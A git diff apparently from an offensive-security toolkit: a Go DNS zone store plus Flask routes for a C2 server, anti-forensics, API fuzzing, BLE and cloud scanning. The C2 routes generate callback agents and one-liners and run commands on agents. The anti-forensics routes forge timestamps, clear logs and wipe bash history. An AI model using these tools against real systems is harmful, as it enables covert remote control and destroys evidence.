ID: fmt.Sprintf("imp%d", time.Now().UnixNano()+int64(added)),
|
||||
Name: hdr.Name,
|
||||
TTL: hdr.Ttl,
|
||||
}
|
||||
|
||||
switch v := rr.(type) {
|
||||
case *dns.A:
|
||||
rec.Type = TypeA
|
||||
rec.Value = v.A.String()
|
||||
case *dns.AAAA:
|
||||
rec.Type = TypeAAAA
|
||||
rec.Value = v.AAAA.String()
|
||||
case *dns.CNAME:
|
||||
rec.Type = TypeCNAME
|
||||
rec.Value = v.Target
|
||||
case *dns.MX:
|
||||
rec.Type = TypeMX
|
||||
rec.Value = v.Mx
|
||||
rec.Priority = v.Preference
|
||||
case *dns.TXT:
|
||||
rec.Type = TypeTXT
|
||||
rec.Value = strings.Join(v.Txt, " ")
|
||||
case *dns.NS:
|
||||
rec.Type = TypeNS
|
||||
rec.Value = v.Ns
|
||||
case *dns.SRV:
|
||||
rec.Type = TypeSRV
|
||||
rec.Value = v.Target
|
||||
rec.Priority = v.Priority
|
||||
rec.Weight = v.Weight
|
||||
rec.Port = v.Port
|
||||
case *dns.PTR:
|
||||
rec.Type = TypePTR
|
||||
rec.Value = v.Ptr
|
||||
default:
|
||||
continue // Skip unsupported types
|
||||
}
|
||||
|
||||
z.Records = append(z.Records, rec)
|
||||
added++
|
||||
}
|
||||
|
||||
if added > 0 {
|
||||
z.SOA.Serial++
|
||||
s.Save(z)
|
||||
}
|
||||
return added, nil
|
||||
}
|
||||
|
||||
// CloneZone duplicates a zone under a new domain.
|
||||
func (s *ZoneStore) CloneZone(srcDomain, dstDomain string) (*Zone, error) {
|
||||
srcFQDN := dns.Fqdn(srcDomain)
|
||||
dstFQDN := dns.Fqdn(dstDomain)
|
||||
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
src, ok := s.zones[srcFQDN]
|
||||
if !ok {
|
||||
return nil, fmt.Errorf("source zone %s not found", srcDomain)
|
||||
}
|
||||
if _, exists := s.zones[dstFQDN]; exists {
|
||||
return nil, fmt.Errorf("destination zone %s already exists", dstDomain)
|
||||
}
|
||||
|
||||
now := time.Now().UTC().Format(time.RFC3339)
|
||||
z := &Zone{
|
||||
Domain: dstDomain,
|
||||
SOA: SOARecord{
|
||||
PrimaryNS: strings.Replace(src.SOA.PrimaryNS, srcDomain, dstDomain, -1),
|
||||
AdminEmail: strings.Replace(src.SOA.AdminEmail, srcDomain, dstDomain, -1),
|
||||
Serial: uint32(time.Now().Unix()),
|
||||
Refresh: src.SOA.Refresh,
|
||||
Retry: src.SOA.Retry,
|
||||
Expire: src.SOA.Expire,
|
||||
MinTTL: src.SOA.MinTTL,
|
||||
},
|
||||
CreatedAt: now,
|
||||
UpdatedAt: now,
|
||||
}
|
||||
|
||||
// Clone records, replacing domain references
|
||||
for _, rec := range src.Records {
|
||||
newRec := rec
|
||||
newRec.ID = fmt.Sprintf("c%d", time.Now().UnixNano())
|
||||
newRec.Name = strings.Replace(rec.Name, srcDomain, dstDomain, -1)
|
||||
newRec.Value = strings.Replace(rec.Value, srcDomain, dstDomain, -1)
|
||||
z.Records = append(z.Records, newRec)
|
||||
time.Sleep(time.Nanosecond) // Ensure unique IDs
|
||||
}
|
||||
|
||||
s.zones[dstFQDN] = z
|
||||
return z, s.Save(z)
|
||||
}
|
||||
|
||||
// BulkAddRecords adds multiple records at once.
|
||||
func (s *ZoneStore) BulkAddRecords(domain string, records []Record) (int, error) {
|
||||
fqdn := dns.Fqdn(domain)
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
z, ok := s.zones[fqdn]
|
||||
if !ok {
|
||||
return 0, fmt.Errorf("zone %s not found", domain)
|
||||
}
|
||||
|
||||
added := 0
|
||||
for _, rec := range records {
|
||||
if rec.ID == "" {
|
||||
rec.ID = fmt.Sprintf("b%d", time.Now().UnixNano()+int64(added))
|
||||
}
|
||||
if rec.TTL == 0 {
|
||||
rec.TTL = 300
|
||||
}
|
||||
z.Records = append(z.Records, rec)
|
||||
added++
|
||||
}
|
||||
|
||||
if added > 0 {
|
||||
z.SOA.Serial++
|
||||
s.Save(z)
|
||||
}
|
||||
return added, nil
|
||||
}
|
||||
42
setup_msi.py
42
setup_msi.py
@ -52,6 +52,48 @@ build_exe_options = {
|
||||
'web.routes.targets', 'web.routes.encmodules',
|
||||
'web.routes.llm_trainer',
|
||||
'web.routes.autonomy',
|
||||
'web.routes.loadtest',
|
||||
'web.routes.phishmail',
|
||||
'web.routes.dns_service',
|
||||
'web.routes.ipcapture',
|
||||
'web.routes.hack_hijack',
|
||||
'web.routes.password_toolkit',
|
||||
'web.routes.webapp_scanner',
|
||||
'web.routes.report_engine',
|
||||
'web.routes.net_mapper',
|
||||
'web.routes.c2_framework',
|
||||
'web.routes.wifi_audit',
|
||||
'web.routes.threat_intel',
|
||||
'web.routes.steganography',
|
||||
'web.routes.api_fuzzer',
|
||||
'web.routes.ble_scanner',
|
||||
'web.routes.forensics',
|
||||
'web.routes.rfid_tools',
|
||||
'web.routes.cloud_scan',
|
||||
'web.routes.malware_sandbox',
|
||||
'web.routes.log_correlator',
|
||||
'web.routes.anti_forensics',
|
||||
'modules.loadtest',
|
||||
'modules.phishmail',
|
||||
'modules.ipcapture',
|
||||
'modules.hack_hijack',
|
||||
'modules.password_toolkit',
|
||||
'modules.webapp_scanner',
|
||||
'modules.report_engine',
|
||||
'modules.net_mapper',
|
||||
'modules.c2_framework',
|
||||
'modules.wifi_audit',
|
||||
'modules.threat_intel',
|
||||
'modules.steganography',
|
||||
'modules.api_fuzzer',
|
||||
'modules.ble_scanner',
|
||||
'modules.forensics',
|
||||
'modules.rfid_tools',
|
||||
'modules.cloud_scan',
|
||||
'modules.malware_sandbox',
|
||||
'modules.log_correlator',
|
||||
'modules.anti_forensics',
|
||||
'core.dns_service',
|
||||
'core.model_router', 'core.rules', 'core.autonomy',
|
||||
],
|
||||
'excludes': ['torch', 'transformers',
|
||||
|
||||
42
web/app.py
42
web/app.py
@ -66,6 +66,27 @@ def create_app():
|
||||
from web.routes.encmodules import encmodules_bp
|
||||
from web.routes.llm_trainer import llm_trainer_bp
|
||||
from web.routes.autonomy import autonomy_bp
|
||||
from web.routes.loadtest import loadtest_bp
|
||||
from web.routes.phishmail import phishmail_bp
|
||||
from web.routes.dns_service import dns_service_bp
|
||||
from web.routes.ipcapture import ipcapture_bp
|
||||
from web.routes.hack_hijack import hack_hijack_bp
|
||||
from web.routes.password_toolkit import password_toolkit_bp
|
||||
from web.routes.webapp_scanner import webapp_scanner_bp
|
||||
from web.routes.report_engine import report_engine_bp
|
||||
from web.routes.net_mapper import net_mapper_bp
|
||||
from web.routes.c2_framework import c2_framework_bp
|
||||
from web.routes.wifi_audit import wifi_audit_bp
|
||||
from web.routes.threat_intel import threat_intel_bp
|
||||
from web.routes.steganography import steganography_bp
|
||||
from web.routes.api_fuzzer import api_fuzzer_bp
|
||||
from web.routes.ble_scanner import ble_scanner_bp
|
||||
from web.routes.forensics import forensics_bp
|
||||
from web.routes.rfid_tools import rfid_tools_bp
|
||||
from web.routes.cloud_scan import cloud_scan_bp
|
||||
from web.routes.malware_sandbox import malware_sandbox_bp
|
||||
from web.routes.log_correlator import log_correlator_bp
|
||||
from web.routes.anti_forensics import anti_forensics_bp
|
||||
|
||||
app.register_blueprint(auth_bp)
|
||||
app.register_blueprint(dashboard_bp)
|
||||
@ -91,6 +112,27 @@ def create_app():
|
||||
app.register_blueprint(encmodules_bp)
|
||||
app.register_blueprint(llm_trainer_bp)
|
||||
app.register_blueprint(autonomy_bp)
|
||||
app.register_blueprint(loadtest_bp)
|
||||
app.register_blueprint(phishmail_bp)
|
||||
app.register_blueprint(dns_service_bp)
|
||||
app.register_blueprint(ipcapture_bp)
|
||||
app.register_blueprint(hack_hijack_bp)
|
||||
app.register_blueprint(password_toolkit_bp)
|
||||
app.register_blueprint(webapp_scanner_bp)
|
||||
app.register_blueprint(report_engine_bp)
|
||||
app.register_blueprint(net_mapper_bp)
|
||||
app.register_blueprint(c2_framework_bp)
|
||||
app.register_blueprint(wifi_audit_bp)
|
||||
app.register_blueprint(threat_intel_bp)
|
||||
app.register_blueprint(steganography_bp)
|
||||
app.register_blueprint(api_fuzzer_bp)
|
||||
app.register_blueprint(ble_scanner_bp)
|
||||
app.register_blueprint(forensics_bp)
|
||||
app.register_blueprint(rfid_tools_bp)
|
||||
app.register_blueprint(cloud_scan_bp)
|
||||
app.register_blueprint(malware_sandbox_bp)
|
||||
app.register_blueprint(log_correlator_bp)
|
||||
app.register_blueprint(anti_forensics_bp)
|
||||
|
||||
# Start network discovery advertising (mDNS + Bluetooth)
|
||||
try:
|
||||
|
||||
97
web/routes/anti_forensics.py
Normal file
97
web/routes/anti_forensics.py
Normal file
@ -0,0 +1,97 @@
|
||||
"""Anti-Forensics routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
anti_forensics_bp = Blueprint('anti_forensics', __name__, url_prefix='/anti-forensics')
|
||||
|
||||
def _get_mgr():
|
||||
from modules.anti_forensics import get_anti_forensics
|
||||
return get_anti_forensics()
|
||||
|
||||
@anti_forensics_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('anti_forensics.html')
|
||||
|
||||
@anti_forensics_bp.route('/capabilities')
|
||||
@login_required
|
||||
def capabilities():
|
||||
return jsonify(_get_mgr().get_capabilities())
|
||||
|
||||
@anti_forensics_bp.route('/delete/file', methods=['POST'])
|
||||
@login_required
|
||||
def delete_file():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().delete.secure_delete_file(
|
||||
data.get('path', ''), data.get('passes', 3), data.get('method', 'random')
|
||||
))
|
||||
|
||||
@anti_forensics_bp.route('/delete/directory', methods=['POST'])
|
||||
@login_required
|
||||
def delete_directory():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().delete.secure_delete_directory(
|
||||
data.get('path', ''), data.get('passes', 3)
|
||||
))
|
||||
|
||||
@anti_forensics_bp.route('/wipe', methods=['POST'])
|
||||
@login_required
|
||||
def wipe_free_space():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().delete.wipe_free_space(data.get('mount_point', '')))
|
||||
|
||||
@anti_forensics_bp.route('/timestamps', methods=['GET', 'POST'])
|
||||
@login_required
|
||||
def timestamps():
|
||||
if request.method == 'POST':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().timestamps.set_timestamps(
|
||||
data.get('path', ''), data.get('accessed'), data.get('modified')
|
||||
))
|
||||
return jsonify(_get_mgr().timestamps.get_timestamps(request.args.get('path', '')))
|
||||
|
||||
@anti_forensics_bp.route('/timestamps/clone', methods=['POST'])
|
||||
@login_required
|
||||
def clone_timestamps():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().timestamps.clone_timestamps(data.get('source', ''), data.get('target', '')))
|
||||
|
||||
@anti_forensics_bp.route('/timestamps/randomize', methods=['POST'])
|
||||
@login_required
|
||||
def randomize_timestamps():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().timestamps.randomize_timestamps(data.get('path', '')))
|
||||
|
||||
@anti_forensics_bp.route('/logs')
|
||||
@login_required
|
||||
def list_logs():
|
||||
return jsonify(_get_mgr().logs.list_logs())
|
||||
|
||||
@anti_forensics_bp.route('/logs/clear', methods=['POST'])
|
||||
@login_required
|
||||
def clear_log():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().logs.clear_log(data.get('path', '')))
|
||||
|
||||
@anti_forensics_bp.route('/logs/remove', methods=['POST'])
|
||||
@login_required
|
||||
def remove_entries():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().logs.remove_entries(data.get('path', ''), data.get('pattern', '')))
|
||||
|
||||
@anti_forensics_bp.route('/logs/history', methods=['POST'])
|
||||
@login_required
|
||||
def clear_history():
|
||||
return jsonify(_get_mgr().logs.clear_bash_history())
|
||||
|
||||
@anti_forensics_bp.route('/scrub/image', methods=['POST'])
|
||||
@login_required
|
||||
def scrub_image():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().scrubber.scrub_image(data.get('path', ''), data.get('output')))
|
||||
|
||||
@anti_forensics_bp.route('/scrub/pdf', methods=['POST'])
|
||||
@login_required
|
||||
def scrub_pdf():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_mgr().scrubber.scrub_pdf_metadata(data.get('path', '')))
|
||||
95
web/routes/api_fuzzer.py
Normal file
95
web/routes/api_fuzzer.py
Normal file
@ -0,0 +1,95 @@
|
||||
"""API Fuzzer routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
api_fuzzer_bp = Blueprint('api_fuzzer', __name__, url_prefix='/api-fuzzer')
|
||||
|
||||
def _get_fuzzer():
|
||||
from modules.api_fuzzer import get_api_fuzzer
|
||||
return get_api_fuzzer()
|
||||
|
||||
@api_fuzzer_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('api_fuzzer.html')
|
||||
|
||||
@api_fuzzer_bp.route('/discover', methods=['POST'])
|
||||
@login_required
|
||||
def discover():
|
||||
data = request.get_json(silent=True) or {}
|
||||
job_id = _get_fuzzer().discover_endpoints(
|
||||
data.get('base_url', ''), data.get('custom_paths')
|
||||
)
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@api_fuzzer_bp.route('/openapi', methods=['POST'])
|
||||
@login_required
|
||||
def parse_openapi():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().parse_openapi(data.get('url', '')))
|
||||
|
||||
@api_fuzzer_bp.route('/fuzz', methods=['POST'])
|
||||
@login_required
|
||||
def fuzz():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().fuzz_params(
|
||||
url=data.get('url', ''),
|
||||
method=data.get('method', 'GET'),
|
||||
params=data.get('params', {}),
|
||||
payload_type=data.get('payload_type', 'type_confusion')
|
||||
))
|
||||
|
||||
@api_fuzzer_bp.route('/auth/bypass', methods=['POST'])
|
||||
@login_required
|
||||
def auth_bypass():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().test_auth_bypass(data.get('url', '')))
|
||||
|
||||
@api_fuzzer_bp.route('/auth/idor', methods=['POST'])
|
||||
@login_required
|
||||
def idor():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().test_idor(
|
||||
data.get('url_template', ''),
|
||||
(data.get('start_id', 1), data.get('end_id', 10)),
|
||||
data.get('auth_token')
|
||||
))
|
||||
|
||||
@api_fuzzer_bp.route('/ratelimit', methods=['POST'])
|
||||
@login_required
|
||||
def rate_limit():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().test_rate_limit(
|
||||
data.get('url', ''), data.get('count', 50), data.get('method', 'GET')
|
||||
))
|
||||
|
||||
@api_fuzzer_bp.route('/graphql/introspect', methods=['POST'])
|
||||
@login_required
|
||||
def graphql_introspect():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().graphql_introspect(data.get('url', '')))
|
||||
|
||||
@api_fuzzer_bp.route('/graphql/depth', methods=['POST'])
|
||||
@login_required
|
||||
def graphql_depth():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().graphql_depth_test(data.get('url', ''), data.get('max_depth', 10)))
|
||||
|
||||
@api_fuzzer_bp.route('/analyze', methods=['POST'])
|
||||
@login_required
|
||||
def analyze():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_fuzzer().analyze_response(data.get('url', ''), data.get('method', 'GET')))
|
||||
|
||||
@api_fuzzer_bp.route('/auth/set', methods=['POST'])
|
||||
@login_required
|
||||
def set_auth():
|
||||
data = request.get_json(silent=True) or {}
|
||||
_get_fuzzer().set_auth(data.get('type', ''), data.get('value', ''), data.get('header', 'Authorization'))
|
||||
return jsonify({'ok': True})
|
||||
|
||||
@api_fuzzer_bp.route('/job/<job_id>')
|
||||
@login_required
|
||||
def job_status(job_id):
|
||||
job = _get_fuzzer().get_job(job_id)
|
||||
return jsonify(job or {'error': 'Job not found'})
|
||||
76
web/routes/ble_scanner.py
Normal file
76
web/routes/ble_scanner.py
Normal file
@ -0,0 +1,76 @@
|
||||
"""BLE Scanner routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
ble_scanner_bp = Blueprint('ble_scanner', __name__, url_prefix='/ble')
|
||||
|
||||
def _get_scanner():
|
||||
from modules.ble_scanner import get_ble_scanner
|
||||
return get_ble_scanner()
|
||||
|
||||
@ble_scanner_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('ble_scanner.html')
|
||||
|
||||
@ble_scanner_bp.route('/status')
|
||||
@login_required
|
||||
def status():
|
||||
return jsonify(_get_scanner().get_status())
|
||||
|
||||
@ble_scanner_bp.route('/scan', methods=['POST'])
|
||||
@login_required
|
||||
def scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().scan(data.get('duration', 10.0)))
|
||||
|
||||
@ble_scanner_bp.route('/devices')
|
||||
@login_required
|
||||
def devices():
|
||||
return jsonify(_get_scanner().get_devices())
|
||||
|
||||
@ble_scanner_bp.route('/device/<address>')
|
||||
@login_required
|
||||
def device_detail(address):
|
||||
return jsonify(_get_scanner().get_device_detail(address))
|
||||
|
||||
@ble_scanner_bp.route('/read', methods=['POST'])
|
||||
@login_required
|
||||
def read_char():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().read_characteristic(data.get('address', ''), data.get('uuid', '')))
|
||||
|
||||
@ble_scanner_bp.route('/write', methods=['POST'])
|
||||
@login_required
|
||||
def write_char():
|
||||
data = request.get_json(silent=True) or {}
|
||||
value = bytes.fromhex(data.get('data_hex', '')) if data.get('data_hex') else data.get('data', '').encode()
|
||||
return jsonify(_get_scanner().write_characteristic(data.get('address', ''), data.get('uuid', ''), value))
|
||||
|
||||
@ble_scanner_bp.route('/vulnscan', methods=['POST'])
|
||||
@login_required
|
||||
def vuln_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().vuln_scan(data.get('address')))
|
||||
|
||||
@ble_scanner_bp.route('/track', methods=['POST'])
|
||||
@login_required
|
||||
def track():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().track_device(data.get('address', '')))
|
||||
|
||||
@ble_scanner_bp.route('/track/<address>/history')
|
||||
@login_required
|
||||
def tracking_history(address):
|
||||
return jsonify(_get_scanner().get_tracking_history(address))
|
||||
|
||||
@ble_scanner_bp.route('/scan/save', methods=['POST'])
|
||||
@login_required
|
||||
def save_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().save_scan(data.get('name')))
|
||||
|
||||
@ble_scanner_bp.route('/scans')
|
||||
@login_required
|
||||
def list_scans():
|
||||
return jsonify(_get_scanner().list_scans())
|
||||
134
web/routes/c2_framework.py
Normal file
134
web/routes/c2_framework.py
Normal file
@ -0,0 +1,134 @@
|
||||
"""C2 Framework — web routes for command & control."""
|
||||
|
||||
from flask import Blueprint, render_template, request, jsonify, Response
|
||||
from web.auth import login_required
|
||||
|
||||
c2_framework_bp = Blueprint('c2_framework', __name__)
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.c2_framework import get_c2_server
|
||||
return get_c2_server()
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('c2_framework.html')
|
||||
|
||||
|
||||
# ── Listeners ─────────────────────────────────────────────────────────────────
|
||||
|
||||
@c2_framework_bp.route('/c2/listeners', methods=['GET'])
|
||||
@login_required
|
||||
def list_listeners():
|
||||
return jsonify({'ok': True, 'listeners': _svc().list_listeners()})
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/listeners', methods=['POST'])
|
||||
@login_required
|
||||
def start_listener():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_svc().start_listener(
|
||||
name=data.get('name', 'default'),
|
||||
host=data.get('host', '0.0.0.0'),
|
||||
port=data.get('port', 4444),
|
||||
))
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/listeners/<name>', methods=['DELETE'])
|
||||
@login_required
|
||||
def stop_listener(name):
|
||||
return jsonify(_svc().stop_listener(name))
|
||||
|
||||
|
||||
# ── Agents ────────────────────────────────────────────────────────────────────
|
||||
|
||||
@c2_framework_bp.route('/c2/agents', methods=['GET'])
|
||||
@login_required
|
||||
def list_agents():
|
||||
return jsonify({'ok': True, 'agents': _svc().list_agents()})
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/agents/<agent_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def remove_agent(agent_id):
|
||||
return jsonify(_svc().remove_agent(agent_id))
|
||||
|
||||
|
||||
# ── Tasks ─────────────────────────────────────────────────────────────────────
|
||||
|
||||
@c2_framework_bp.route('/c2/agents/<agent_id>/exec', methods=['POST'])
|
||||
@login_required
|
||||
def exec_command(agent_id):
|
||||
data = request.get_json(silent=True) or {}
|
||||
command = data.get('command', '')
|
||||
if not command:
|
||||
return jsonify({'ok': False, 'error': 'No command'})
|
||||
return jsonify(_svc().execute_command(agent_id, command))
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/agents/<agent_id>/download', methods=['POST'])
|
||||
@login_required
|
||||
def download_file(agent_id):
|
||||
data = request.get_json(silent=True) or {}
|
||||
path = data.get('path', '')
|
||||
if not path:
|
||||
return jsonify({'ok': False, 'error': 'No path'})
|
||||
return jsonify(_svc().download_file(agent_id, path))
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/agents/<agent_id>/upload', methods=['POST'])
|
||||
@login_required
|
||||
def upload_file(agent_id):
|
||||
f = request.files.get('file')
|
||||
data = request.form
|
||||
path = data.get('path', '')
|
||||
if not f or not path:
|
||||
return jsonify({'ok': False, 'error': 'File and path required'})
|
||||
return jsonify(_svc().upload_file(agent_id, path, f.read()))
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/tasks/<task_id>', methods=['GET'])
|
||||
@login_required
|
||||
def task_result(task_id):
|
||||
return jsonify(_svc().get_task_result(task_id))
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/tasks', methods=['GET'])
|
||||
@login_required
|
||||
def list_tasks():
|
||||
agent_id = request.args.get('agent_id', '')
|
||||
return jsonify({'ok': True, 'tasks': _svc().list_tasks(agent_id)})
|
||||
|
||||
|
||||
# ── Agent Generation ──────────────────────────────────────────────────────────
|
||||
|
||||
@c2_framework_bp.route('/c2/generate', methods=['POST'])
|
||||
@login_required
|
||||
def generate_agent():
|
||||
data = request.get_json(silent=True) or {}
|
||||
host = data.get('host', '').strip()
|
||||
if not host:
|
||||
return jsonify({'ok': False, 'error': 'Callback host required'})
|
||||
result = _svc().generate_agent(
|
||||
host=host,
|
||||
port=data.get('port', 4444),
|
||||
agent_type=data.get('type', 'python'),
|
||||
interval=data.get('interval', 5),
|
||||
jitter=data.get('jitter', 2),
|
||||
)
|
||||
# Don't send filepath in API response
|
||||
result.pop('filepath', None)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@c2_framework_bp.route('/c2/oneliner', methods=['POST'])
|
||||
@login_required
|
||||
def get_oneliner():
|
||||
data = request.get_json(silent=True) or {}
|
||||
host = data.get('host', '').strip()
|
||||
if not host:
|
||||
return jsonify({'ok': False, 'error': 'Host required'})
|
||||
return jsonify(_svc().get_oneliner(host, data.get('port', 4444),
|
||||
data.get('type', 'python')))
|
||||
60
web/routes/cloud_scan.py
Normal file
60
web/routes/cloud_scan.py
Normal file
@ -0,0 +1,60 @@
|
||||
"""Cloud Security Scanner routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
cloud_scan_bp = Blueprint('cloud_scan', __name__, url_prefix='/cloud')
|
||||
|
||||
def _get_scanner():
|
||||
from modules.cloud_scan import get_cloud_scanner
|
||||
return get_cloud_scanner()
|
||||
|
||||
@cloud_scan_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('cloud_scan.html')
|
||||
|
||||
@cloud_scan_bp.route('/s3/enum', methods=['POST'])
|
||||
@login_required
|
||||
def s3_enum():
|
||||
data = request.get_json(silent=True) or {}
|
||||
job_id = _get_scanner().enum_s3_buckets(
|
||||
data.get('keyword', ''), data.get('prefixes'), data.get('suffixes')
|
||||
)
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@cloud_scan_bp.route('/gcs/enum', methods=['POST'])
|
||||
@login_required
|
||||
def gcs_enum():
|
||||
data = request.get_json(silent=True) or {}
|
||||
job_id = _get_scanner().enum_gcs_buckets(data.get('keyword', ''))
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@cloud_scan_bp.route('/azure/enum', methods=['POST'])
|
||||
@login_required
|
||||
def azure_enum():
|
||||
data = request.get_json(silent=True) or {}
|
||||
job_id = _get_scanner().enum_azure_blobs(data.get('keyword', ''))
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@cloud_scan_bp.route('/services', methods=['POST'])
|
||||
@login_required
|
||||
def exposed_services():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().scan_exposed_services(data.get('target', '')))
|
||||
|
||||
@cloud_scan_bp.route('/metadata')
|
||||
@login_required
|
||||
def metadata():
|
||||
return jsonify(_get_scanner().check_metadata_access())
|
||||
|
||||
@cloud_scan_bp.route('/subdomains', methods=['POST'])
|
||||
@login_required
|
||||
def subdomains():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_scanner().enum_cloud_subdomains(data.get('domain', '')))
|
||||
|
||||
@cloud_scan_bp.route('/job/<job_id>')
|
||||
@login_required
|
||||
def job_status(job_id):
|
||||
job = _get_scanner().get_job(job_id)
|
||||
return jsonify(job or {'error': 'Job not found'})
|
||||
691
web/routes/dns_service.py
Normal file
691
web/routes/dns_service.py
Normal file
@ -0,0 +1,691 @@
|
||||
"""DNS Service web routes — manage the Go-based DNS server from the dashboard."""
|
||||
|
||||
from flask import Blueprint, render_template, request, jsonify
|
||||
from web.auth import login_required
|
||||
|
||||
dns_service_bp = Blueprint('dns_service', __name__, url_prefix='/dns')
|
||||
|
||||
|
||||
def _mgr():
|
||||
from core.dns_service import get_dns_service
|
||||
return get_dns_service()
|
||||
|
||||
|
||||
@dns_service_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('dns_service.html')
|
||||
|
||||
|
||||
@dns_service_bp.route('/nameserver')
|
||||
@login_required
|
||||
def nameserver():
|
||||
return render_template('dns_nameserver.html')
|
||||
|
||||
|
||||
@dns_service_bp.route('/network-info')
|
||||
@login_required
|
||||
def network_info():
|
||||
"""Auto-detect local network info for EZ-Local setup."""
|
||||
import socket
|
||||
import subprocess as sp
|
||||
info = {'ok': True}
|
||||
|
||||
# Hostname
|
||||
info['hostname'] = socket.gethostname()
|
||||
try:
|
||||
info['fqdn'] = socket.getfqdn()
|
||||
except Exception:
|
||||
info['fqdn'] = info['hostname']
|
||||
|
||||
# Local IPs
|
||||
local_ips = []
|
||||
try:
|
||||
# Connect to external to find default route IP
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.connect(('8.8.8.8', 53))
|
||||
default_ip = s.getsockname()[0]
|
||||
s.close()
|
||||
info['default_ip'] = default_ip
|
||||
except Exception:
|
||||
info['default_ip'] = '127.0.0.1'
|
||||
|
||||
# Gateway detection
|
||||
try:
|
||||
r = sp.run(['ip', 'route', 'show', 'default'], capture_output=True, text=True, timeout=5)
|
||||
if r.stdout:
|
||||
parts = r.stdout.split()
|
||||
if 'via' in parts:
|
||||
info['gateway'] = parts[parts.index('via') + 1]
|
||||
except Exception:
|
||||
pass
|
||||
if 'gateway' not in info:
|
||||
try:
|
||||
# Windows: parse ipconfig or route print
|
||||
r = sp.run(['route', 'print', '0.0.0.0'], capture_output=True, text=True, timeout=5)
|
||||
for line in r.stdout.splitlines():
|
||||
parts = line.split()
|
||||
if len(parts) >= 3 and parts[0] == '0.0.0.0':
|
||||
info['gateway'] = parts[2]
|
||||
break
|
||||
except Exception:
|
||||
info['gateway'] = ''
|
||||
|
||||
# Subnet guess from default IP
|
||||
ip = info.get('default_ip', '')
|
||||
if ip and ip != '127.0.0.1':
|
||||
parts = ip.split('.')
|
||||
if len(parts) == 4:
|
||||
info['subnet'] = f"{parts[0]}.{parts[1]}.{parts[2]}.0/24"
|
||||
info['network_prefix'] = f"{parts[0]}.{parts[1]}.{parts[2]}"
|
||||
|
||||
# ARP table for existing hosts
|
||||
hosts = []
|
||||
try:
|
||||
r = sp.run(['arp', '-a'], capture_output=True, text=True, timeout=10)
|
||||
for line in r.stdout.splitlines():
|
||||
# Parse arp output (Windows: " 192.168.1.1 00-aa-bb-cc-dd-ee dynamic")
|
||||
parts = line.split()
|
||||
if len(parts) >= 2:
|
||||
candidate = parts[0].strip()
|
||||
if candidate.count('.') == 3 and not candidate.startswith('224.') and not candidate.startswith('255.'):
|
||||
try:
|
||||
socket.inet_aton(candidate)
|
||||
mac = parts[1] if len(parts) >= 2 else ''
|
||||
# Try reverse DNS
|
||||
try:
|
||||
name = socket.gethostbyaddr(candidate)[0]
|
||||
except Exception:
